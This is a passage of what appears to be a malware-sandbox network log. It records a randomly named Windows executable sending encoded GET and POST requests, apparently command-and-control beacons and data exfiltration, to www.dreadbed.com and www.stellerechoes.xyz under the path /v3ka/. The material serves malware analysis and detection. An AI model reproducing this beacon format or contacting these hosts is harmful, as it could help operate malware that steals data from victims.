Feb 28, 2024 15:45:28.888631105 CET	1286	OUT	Data Raw: 33 39 38 75 4f 2b 37 2f 54 68 6e 54 61 4b 49 77 52 4f 66 4e 50 56 36 53 69 74 41 73 31 59 31 49 41 2f 73 32 4a 31 73 32 6a 63 50 58 6e 4e 4b 37 6a 54 39 32 51 44 57 70 6c 58 31 68 74 48 4e 41 6b 4f 59 4e 64 4e 45 57 33 49 33 38 73 68 6e 68 75 53 Data Ascii: 398uO+7/ThnTaKIwROfNPV6SitAs1Y1IA/s2J1s2jcPXnNK7jT92QDWplX1htHNAkOYNdNEW3I38shnhuSFzc0f6OzbHiIWMx8PD2ze4c7aXQPHmFrxYZ7zFbRPlKR/FGdq3CD6V01DdapWMXHFk8ft2V8qdGveMq3h98JkCNsOS5VZXpAexaR7QOgQtYqINuWJNTLBDrqS77PPB11Vr4AuV13NRFjIPGnmQnmIocn8SUQWQnxi
Feb 28, 2024 15:45:28.888705969 CET	1286	OUT	Data Raw: 2b 59 50 76 78 55 74 35 4c 67 73 47 34 68 43 69 30 45 34 30 4a 76 59 75 58 67 57 6f 31 39 68 37 30 68 31 4b 57 71 4e 4a 48 6e 6e 58 4e 30 65 50 78 6a 30 39 6a 50 4c 48 6a 70 51 4f 37 2f 33 61 50 54 6e 38 37 71 79 6f 37 69 4b 49 6f 2f 46 68 53 30 Data Ascii: +YPvxUt5LgsG4hCi0E40JvYuXgWo19h70h1KWqNJHnnXN0ePxj09jPLHjpQO7/3aPTn87qyo7iKIo/FhS02jWxJB41XK/PUW9bhcJ9jpxNTXYRuW6ofRyl6yzdCuDK44bVYdzWStqQu8s6voDk8hh8FUluxtBSchHfIKb1vtOBuYTzUx8xS0u0p3ggha2+HxjhuEiTDi4UsHKSzMEpOLu/LC/h+ihnvocCKFZpLAZ0zMCM37Xtp
Feb 28, 2024 15:45:28.889051914 CET	1286	OUT	Data Raw: 4f 35 4a 77 30 71 48 4f 67 35 76 61 42 4b 6c 43 34 76 37 50 70 78 66 78 4a 51 65 57 55 4d 58 2f 52 38 44 6d 32 68 6e 35 38 74 53 74 65 30 62 41 36 52 58 76 76 31 77 52 50 59 2f 75 47 76 32 35 66 35 64 53 5a 36 74 74 63 48 58 63 45 71 68 70 43 75 Data Ascii: O5Jw0qHOg5vaBKlC4v7PpxfxJQeWUMX/R8Dm2hn58tSte0bA6RXvv1wRPY/uGv25f5dSZ6ttcHXcEqhpCuINFe2NiLtHf4u3LRKgxO6mJ0dz6WwbnXfrB7k/lkGFoXrriAdYlRRhkWUnRZlpQV/lX+V2mTwPjk0t2R+5zd+tfJoXQ6hpJwk48ETkYNnw6ucjAVBx7fKJfIz57Nc68EOmPL4nl0PTGnMZD+zZmguDoBQj221zC4Z
Feb 28, 2024 15:45:28.889218092 CET	1286	OUT	Data Raw: 71 52 2f 64 73 6f 79 4e 69 75 74 37 66 35 71 4e 32 38 2f 7a 72 47 2b 66 45 59 37 6d 68 76 32 66 66 4d 2b 67 35 59 59 6c 6c 4c 70 73 6f 4f 30 65 62 76 69 6b 63 49 58 72 47 45 69 71 75 70 6c 70 43 42 39 53 33 49 73 31 76 36 6b 56 33 66 72 5a 51 6a Data Ascii: qR/dsoyNiut7f5qN28/zrG+fEY7mhv2ffM+g5YYllLpsoO0ebvikcIXrGEiquplpCB9S3Is1v6kV3frZQjWFoYqTl8EwJc1sRVV41FuWnZhhRAAGEOrtlNQC2j4ne0eQFu3rDVLd3iQfHBHWK2/8CuyETH5QiB0boGD3A/g7r/fXK7gSHTebpWdpEZVm52OSSOUIPbU8oEXrUTcd5K2PP0YJ7IE7L/mSHo4guAyUOLxpgHqqj8q
Feb 28, 2024 15:45:29.130392075 CET	9002	OUT	Data Raw: 58 74 52 35 37 4b 67 4d 58 36 79 41 32 56 31 41 38 39 66 30 66 4b 71 55 39 36 52 59 34 4f 2b 2b 61 6e 72 33 2b 56 33 7a 42 69 4c 66 51 65 53 34 70 47 56 48 75 77 6c 43 61 37 66 54 79 48 7a 48 38 75 77 72 36 30 6d 5a 54 42 39 51 57 6f 4f 6b 32 53 Data Ascii: XtR57KgMX6yA2V1A89f0fKqU96RY4O++anr3+V3zBiLfQeS4pGVHuwlCa7fTyHzH8uwr60mZTB9QWoOk2SQrHVuLGSwKmeNmHCCRDcebclaSxCD0kwHS7Cl/NjrAabRx+e4wb+kneHFq7gKR/5wLukw3XKXDrRij5ZaRR0gG9HtwSq3kyTdXNyl+gCnmOmihwppMYS7D+66Rg8AMhd6lHS30IvxZyWo9IyYzd9q/Aa0T21fCrF7
Feb 28, 2024 15:45:29.130537033 CET	1286	OUT	Data Raw: 4c 6e 52 42 57 31 5a 4c 65 6b 4b 47 4d 32 78 5a 6f 75 55 34 34 42 49 4e 52 53 71 56 5a 62 43 63 4d 47 39 57 65 7a 77 51 67 66 55 4d 59 57 43 76 58 5a 6e 52 6b 74 6d 53 78 67 55 34 33 52 34 46 69 63 59 78 4f 64 79 36 6a 49 54 67 30 50 6c 6e 30 73 Data Ascii: LnRBW1ZLekKGM2xZouU44BINRSqVZbCcMG9WezwQgfUMYWCvXZnRktmSxgU43R4FicYxOdy6jITg0Pln0sGHEWsmqlzSv+CeeaD2nb8iF3CQbe6qEFeu80ll7RIgov2Hk8b6n+9X1Vpw2/4K/6gkbTlHHPidFgfRFW7sf86+4YUB7/djSdA9rIRM3iMxlotnRVfX1ml0vysUJhpnxEf1hFRFcyJnypYSzcK61aC9tsQgxdNyNWu
Feb 28, 2024 15:45:29.130707026 CET	2572	OUT	Data Raw: 48 31 54 6d 48 77 77 4d 59 48 48 44 6b 50 4a 54 47 75 61 59 63 31 66 66 4b 6a 54 70 38 50 35 78 41 37 34 39 31 4a 4d 2f 4a 34 47 2f 2f 64 65 54 4d 61 6c 6a 58 66 79 42 55 54 59 36 6e 57 48 71 4a 73 6f 30 41 53 45 4d 4f 47 6c 31 69 75 71 57 4c 74 Data Ascii: H1TmHwwMYHHDkPJTGuaYc1ffKjTp8P5xA7491JM/J4G//deTMaljXfyBUTY6nWHqJso0ASEMOGl1iuqWLt4Hltkm/qwaUFeJHGCMPQjC2dCggwYx5yfVUcDd06Td56DwDL13IIV4xBYSd8WB9jsRMol0EG4L2p8BjcHTxHkq6i3WfFTfRNnapZtzeIjuLq6Hh4RI6Ee8eoxfXit9EU+eSM/OXsThsleX7EPbfBFWZ+xQWRyz1O9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	50239	198.54.117.242	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:31.396166086 CET	461	OUT	GET /v3ka/?nf8dPP8p=6uRTEcONOSwyaRtqyCIcI/jbJbhdl1D0iGrt2seiEdMiqBKCwYyYvMrO5fxXMQNYUGElLXPpIQYaUrVgpe2t46086L+DcudheMq8m9d90rsu66Tx6HOHsqM=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.dreadbed.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:45:32.724479914 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 28 Feb 2024 14:45:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Set-Cookie: SessionId=e87f77d543c046b5beab40ecb5fddf5d; domain=.www.namecheap.com; path=/; httponly Set-Cookie: x-ncpl-csrf=86c67ad6c13c4493884aa361be46b34f; domain=.www.namecheap.com; path=/; secure; samesite=none X-Proxy-Cache: HIT Server: namecheap-nginx Data Raw: 31 65 38 39 0d 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 52 65 67 69 73 74 72 61 6e 74 20 57 48 4f 49 53 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 7c 20 4e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 67 2f 6e 63 2d 69 63 6f 6e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 6e 63 5f 6d 61 69 6e 4c 65 67 61 63 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 6e 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 7d 3b 72 65 74 75 72 6e 20 6e 2e 64 28 65 2c 22 61 22 2c 65 29 2c 65 7d 2c 6e 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 6e 29 7d 2c 6e 2e 70 3d 22 22 2c 6e 28 6e 2e 73 3d 32 37 33 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 72 3d 65 28 33 29 2c 69 3d 65 28 31 Data Ascii: 1e89<html><head lang="en"><meta charset="UTF-8"/><title>Registrant WHOIS contact information verification \| Namecheap.com</title><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="shortcut icon" href="https://www.namecheap.com/assets/img/nc-icon/favicon.ico"/><script type="text/javascript">var nc_mainLegacy=function(t){function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}var e={};return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)\|\|Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,n){return Object.prototype.hasOwnProperty.call(t,n)},n.p="",n(n.s=273)}([function(t,n,e){var r=e(3),i=e(1
Feb 28, 2024 15:45:32.724634886 CET	1286	IN	Data Raw: 35 29 2c 6f 3d 65 28 31 30 29 2c 61 3d 65 28 31 31 29 2c 75 3d 65 28 31 36 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 63 2c 66 2c 6c 2c 68 2c 70 3d 74 26 73 2e 46 2c 64 3d 74 26 73 2e 47 2c 79 3d 74 26 73 2e 53 2c 76 Data Ascii: 5),o=e(10),a=e(11),u=e(16),s=function(t,n,e){var c,f,l,h,p=t&s.F,d=t&s.G,y=t&s.S,v=t&s.P,g=t&s.B,m=d?r:y?r[n]\|\|(r[n]={}):(r[n]\|\|{}).prototype,b=d?i:i[n]\|\|(i[n]={}),w=b.prototype\|\|(b.prototype={});d&&(e=n);for(c in e)f=!p&&m&&void 0!==m[c],l=(f
Feb 28, 2024 15:45:32.724719048 CET	1286	IN	Data Raw: 66 28 72 28 74 29 2c 6e 3d 6f 28 6e 2c 21 30 29 2c 72 28 65 29 2c 69 29 74 72 79 7b 72 65 74 75 72 6e 20 61 28 74 2c 6e 2c 65 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 67 65 74 22 69 6e 20 65 7c 7c 22 73 65 74 22 69 6e 20 65 29 74 68 72 6f Data Ascii: f(r(t),n=o(n,!0),r(e),i)try{return a(t,n,e)}catch(t){}if("get"in e\|\|"set"in e)throw TypeError("Accessors not supported!");return"value"in e&&(t[n]=e.value),t}},function(t,n,e){t.exports=!e(2)(function(){return 7!=Object.defineProperty({},"a",{
Feb 28, 2024 15:45:32.724786043 CET	1286	IN	Data Raw: 6e 20 6e 21 3d 3d 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7c 7c 6e 2e 73 70 6c 69 74 28 27 22 27 29 2e 6c 65 6e 67 74 68 3e 33 7d 29 2c 22 53 74 72 69 6e 67 22 2c 65 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 65 3d 4d Data Ascii: n n!==n.toLowerCase()\|\|n.split('"').length>3}),"String",e)}},function(t,n){var e=Math.ceil,r=Math.floor;t.exports=function(t){return isNaN(t=+t)?0:(t>0?r:e)(t)}},function(t,n){var e=t.exports={version:"2.5.7"};"number"==typeof __e&&(__e=e)},fu
Feb 28, 2024 15:45:32.724843025 CET	1286	IN	Data Raw: 61 72 20 65 3d 31 3d 3d 74 2c 73 3d 32 3d 3d 74 2c 63 3d 33 3d 3d 74 2c 66 3d 34 3d 3d 74 2c 6c 3d 36 3d 3d 74 2c 68 3d 35 3d 3d 74 7c 7c 6c 2c 70 3d 6e 7c 7c 75 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 75 2c 64 29 7b 66 6f 72 28 Data Ascii: ar e=1==t,s=2==t,c=3==t,f=4==t,l=6==t,h=5==t\|\|l,p=n\|\|u;return function(n,u,d){for(var y,v,g=o(n),m=i(g),b=r(u,d,3),w=a(m.length),S=0,M=e?p(n,w):s?p(n,0):void 0;w>S;S++)if((h\|\|S in m)&&(y=m[S],v=b(y,S,g),t))if(e)M[S]=v;else if(v)switch(t){case
Feb 28, 2024 15:45:32.724952936 CET	1286	IN	Data Raw: 29 2c 76 3d 65 28 31 30 36 29 2c 67 3d 65 28 33 30 29 2c 6d 3d 65 28 32 35 29 2c 62 3d 65 28 31 32 29 2c 77 3d 65 28 35 32 29 2c 53 3d 65 28 31 29 2c 4d 3d 65 28 39 29 2c 6b 3d 65 28 37 33 29 2c 78 3d 65 28 33 33 29 2c 45 3d 65 28 33 35 29 2c 54 Data Ascii: ),v=e(106),g=e(30),m=e(25),b=e(12),w=e(52),S=e(1),M=e(9),k=e(73),x=e(33),E=e(35),T=e(34).f,_=e(74),j=e(26),A=e(5),O=e(23),F=e(43),P=e(77),N=e(99),D=e(45),K=e(54),R=e(38),I=e(75),B=e(98),z=e(7),C=e(27),L=z.f,q=C.f,J=i.RangeError,W=i.TypeError,G
Feb 28, 2024 15:45:32.725009918 CET	1286	IN	Data Raw: 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 66 3d 73 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 76 6f 69 64 20 30 2c 6c 3d 76 6f 69 64 20 30 21 3d 3d 66 2c 68 3d 5f 28 75 29 3b 69 66 28 76 6f 69 64 20 30 21 3d 68 26 26 21 6b 28 68 29 29 7b 66 6f 72 Data Ascii: ents.length,f=s>1?arguments[1]:void 0,l=void 0!==f,h=_(u);if(void 0!=h&&!k(h)){for(a=h.call(u),r=[],n=0;!(o=a.next()).done;n++)r.push(o.value);u=r}for(l&&s>2&&(f=c(f,arguments[2],2)),n=0,e=y(u.length),i=Tt(this,e);e>n;n++)i[n]=l?f(u[n],n):u[n]
Feb 28, 2024 15:45:32.725064039 CET	1286	IN	Data Raw: 69 73 29 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 74 28 45 74 28 74 68 69 73 29 2c 74 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b Data Ascii: is),arguments)},map:function(t){return St(Et(this),t,arguments.length>1?arguments[1]:void 0)},reduce:function(t){return ut.apply(Et(this),arguments)},reduceRight:function(t){return st.apply(Et(this),arguments)},reverse:function(){for(var t,n=t
Feb 28, 2024 15:45:32.725323915 CET	1286	IN	Data Raw: 7d 3b 6d 74 7c 7c 28 43 2e 66 3d 7a 74 2c 7a 2e 66 3d 43 74 29 2c 61 28 61 2e 53 2b 61 2e 46 2a 21 6d 74 2c 22 4f 62 6a 65 63 74 22 2c 7b 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 3a 7a 74 2c 64 65 66 69 6e 65 50 72 Data Ascii: };mt\|\|(C.f=zt,z.f=Ct),a(a.S+a.F*!mt,"Object",{getOwnPropertyDescriptor:zt,defineProperty:Ct}),o(function(){ht.call({})})&&(ht=pt=function(){return ct.call(this)});var Lt=p({},Dt);p(Lt,It),h(Lt,dt,It.values),p(Lt,{slice:Kt,set:Rt,constructor:fu
Feb 28, 2024 15:45:32.725421906 CET	1286	IN	Data Raw: 74 72 75 63 74 6f 72 22 2c 64 29 29 3a 6f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 31 29 7d 29 26 26 6f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 65 77 20 64 28 2d 31 29 7d 29 26 26 4b 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 65 77 20 64 2c 6e 65 Data Ascii: tructor",d)):o(function(){d(1)})&&o(function(){new d(-1)})&&K(function(t){new d,new d(null),new d(1.5),new d(t)},!0)\|\|(d=e(function(t,e,r,i){f(t,d,c);var o;return S(e)?e instanceof U\|\|"ArrayBuffer"==(o=w(e))\|\|"SharedArrayBuffer"==o?void 0!==i?
Feb 28, 2024 15:45:32.961946964 CET	1286	IN	Data Raw: 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 72 3d 65 28 31 34 29 2c 69 3d 4d 61 74 68 2e 6d 61 78 2c 6f 3d 4d 61 74 68 2e 6d 69 6e 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e Data Ascii: },function(t,n,e){var r=e(14),i=Math.max,o=Math.min;t.exports=function(t,n){return t=r(t),t<0?i(t+n,0):o(t,n)}},function(t,n){t.exports=!1},function(t,n,e){var r=e(26)("meta"),i=e(1),o=e(12),a=e(7).f,u=0,s=Object.isExtensible\|\|function(){retur

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	50240	198.177.123.106	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:38.820396900 CET	739	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.stellerechoes.xyz Origin: http://www.stellerechoes.xyz Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.stellerechoes.xyz/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 4c 48 33 72 48 4c 62 58 49 77 54 2b 43 52 6c 72 6f 42 73 59 62 31 30 52 64 39 5a 63 75 43 2f 56 4f 37 2f 33 4f 32 31 6e 44 55 48 37 36 79 46 6f 4c 6b 72 76 62 33 76 31 62 50 42 4c 52 48 44 74 6f 2f 74 45 53 2b 2b 6c 78 36 58 64 68 67 62 4c 59 36 6c 59 59 32 39 74 39 58 6e 36 6a 72 51 4d 66 53 53 5a 33 41 73 75 47 6a 36 77 37 72 79 72 67 43 54 73 7a 4d 54 38 79 5a 57 45 78 73 61 36 4d 45 73 34 4d 58 62 43 70 6b 58 55 75 56 49 72 75 4f 4e 64 4a 61 45 6f 4a 46 4b 6f 30 42 41 47 4c 59 4c 77 34 37 42 4f 41 35 55 64 34 6f 35 42 72 5a 7a 42 62 50 37 6f 78 6a 65 2f 52 6f 51 65 6b 51 3d 3d Data Ascii: nf8dPP8p=LH3rHLbXIwT+CRlroBsYb10Rd9ZcuC/VO7/3O21nDUH76yFoLkrvb3v1bPBLRHDto/tES++lx6XdhgbLY6lYY29t9Xn6jrQMfSSZ3AsuGj6w7ryrgCTszMT8yZWExsa6MEs4MXbCpkXUuVIruONdJaEoJFKo0BAGLYLw47BOA5Ud4o5BrZzBbP7oxje/RoQekQ==
Feb 28, 2024 15:45:39.107223988 CET	169	IN	HTTP/1.0 500 Internal Server Error Date: Wed, 28 Feb 2024 14:45:38 GMT Server: Apache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	50241	198.177.123.106	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:41.540082932 CET	1079	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.stellerechoes.xyz Origin: http://www.stellerechoes.xyz Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.stellerechoes.xyz/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 4c 48 33 72 48 4c 62 58 49 77 54 2b 43 79 39 72 71 69 45 59 54 31 30 53 44 74 5a 63 6e 69 2f 5a 4f 37 7a 33 4f 33 77 67 44 68 58 37 37 58 68 6f 4b 6d 44 76 61 33 76 31 44 2f 42 4b 66 6e 44 32 6f 2f 52 36 53 2f 43 6c 78 36 7a 64 7a 6a 6a 4c 65 4b 6c 62 51 57 39 69 2b 58 6e 37 79 62 51 57 66 53 50 32 33 46 4d 75 48 53 57 77 36 6f 61 72 6c 57 48 74 33 73 54 36 37 35 57 46 36 4d 61 67 4d 45 70 48 4d 57 69 33 70 57 4c 55 76 30 6f 72 76 4f 4e 61 51 61 46 42 4c 46 4c 36 35 7a 6c 49 44 36 6a 4d 78 34 68 56 41 71 41 37 31 6f 74 2f 73 34 79 37 48 38 6a 69 30 77 61 67 64 38 42 37 6d 42 6c 6c 6b 65 65 6e 50 46 76 34 41 2f 51 66 62 73 6a 6e 7a 6e 53 72 55 56 6b 53 77 6c 46 54 50 4b 49 62 67 33 55 4c 65 35 74 49 74 39 6e 51 6a 74 4f 31 46 6a 2b 46 59 41 59 39 68 70 37 43 43 6a 77 45 76 58 57 76 75 48 45 70 4d 74 77 44 51 6e 50 55 6d 37 4d 4d 6c 70 65 62 45 4d 71 6e 4d 39 37 70 64 77 37 45 61 44 68 49 31 46 38 35 57 39 39 50 4a 41 77 4d 48 47 76 31 62 69 32 37 48 72 35 6a 4e 36 58 67 39 4a 6e 53 4e 6f 63 4d 77 4a 4f 58 48 69 58 78 41 70 4b 6f 5a 4b 33 71 38 71 4c 30 79 68 56 4f 7a 6b 62 54 43 4f 74 4c 41 57 6d 6b 64 31 44 6d 52 74 50 36 55 68 4c 5a 35 6e 58 35 6e 6d 4c 50 31 57 44 41 53 76 73 75 41 32 4d 69 31 58 38 2b 78 6d 4a 71 72 32 42 4b 4e 48 6b 6b 4e 71 30 6b 57 37 45 4f 4d 6a 44 32 4a 38 4f 77 74 57 34 7a 35 56 6d 63 51 4f 4a 57 57 51 39 54 43 35 42 46 35 30 4f 68 48 34 2f 53 7a 73 70 30 34 66 32 6f 41 6e 46 6a 45 76 6f 52 74 63 6b 56 44 34 46 65 6e 55 33 4e 7a 55 70 67 4a 69 48 56 34 39 55 61 47 61 58 31 51 6c 4f 63 50 6a 62 6e 70 43 52 38 48 70 37 6f 73 74 44 62 6d 6c 38 79 78 74 45 3d Data Ascii: nf8dPP8p=LH3rHLbXIwT+Cy9rqiEYT10SDtZcni/ZO7z3O3wgDhX77XhoKmDva3v1D/BKfnD2o/R6S/Clx6zdzjjLeKlbQW9i+Xn7ybQWfSP23FMuHSWw6oarlWHt3sT675WF6MagMEpHMWi3pWLUv0orvONaQaFBLFL65zlID6jMx4hVAqA71ot/s4y7H8ji0wagd8B7mBllkeenPFv4A/QfbsjnznSrUVkSwlFTPKIbg3ULe5tIt9nQjtO1Fj+FYAY9hp7CCjwEvXWvuHEpMtwDQnPUm7MMlpebEMqnM97pdw7EaDhI1F85W99PJAwMHGv1bi27Hr5jN6Xg9JnSNocMwJOXHiXxApKoZK3q8qL0yhVOzkbTCOtLAWmkd1DmRtP6UhLZ5nX5nmLP1WDASvsuA2Mi1X8+xmJqr2BKNHkkNq0kW7EOMjD2J8OwtW4z5VmcQOJWWQ9TC5BF50OhH4/Szsp04f2oAnFjEvoRtckVD4FenU3NzUpgJiHV49UaGaX1QlOcPjbnpCR8Hp7ostDbml8yxtE=
Feb 28, 2024 15:45:41.829135895 CET	169	IN	HTTP/1.0 500 Internal Server Error Date: Wed, 28 Feb 2024 14:45:41 GMT Server: Apache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	50242	198.177.123.106	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:44.261203051 CET	3858	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.stellerechoes.xyz Origin: http://www.stellerechoes.xyz Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.stellerechoes.xyz/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 4c 48 33 72 48 4c 62 58 49 77 54 2b 43 79 39 72 71 69 45 59 54 31 30 53 44 74 5a 63 6e 69 2f 5a 4f 37 7a 33 4f 33 77 67 44 68 66 37 36 6b 5a 6f 49 41 4c 76 4c 48 76 31 64 50 42 50 66 6e 44 33 6f 2f 35 6d 53 2f 4f 66 78 34 37 64 7a 51 4c 4c 65 2f 35 62 46 6d 39 6a 37 58 6e 35 6a 72 52 58 66 53 53 33 33 46 59 68 47 6a 69 77 37 71 43 72 67 6b 76 73 37 63 54 38 37 35 57 42 2b 4d 61 6f 4d 45 6b 61 4d 58 65 33 70 56 76 55 75 48 51 72 74 5a 52 61 4b 61 46 41 59 6c 4c 70 7a 54 6c 70 44 37 48 79 78 34 68 46 41 72 45 37 31 75 74 2f 74 2f 65 36 48 63 6a 69 37 67 61 68 5a 38 46 33 6d 42 49 32 6b 65 47 6e 50 44 50 34 61 66 51 66 51 74 6a 6b 68 48 53 74 43 6c 6b 4a 36 31 4a 62 50 4c 73 58 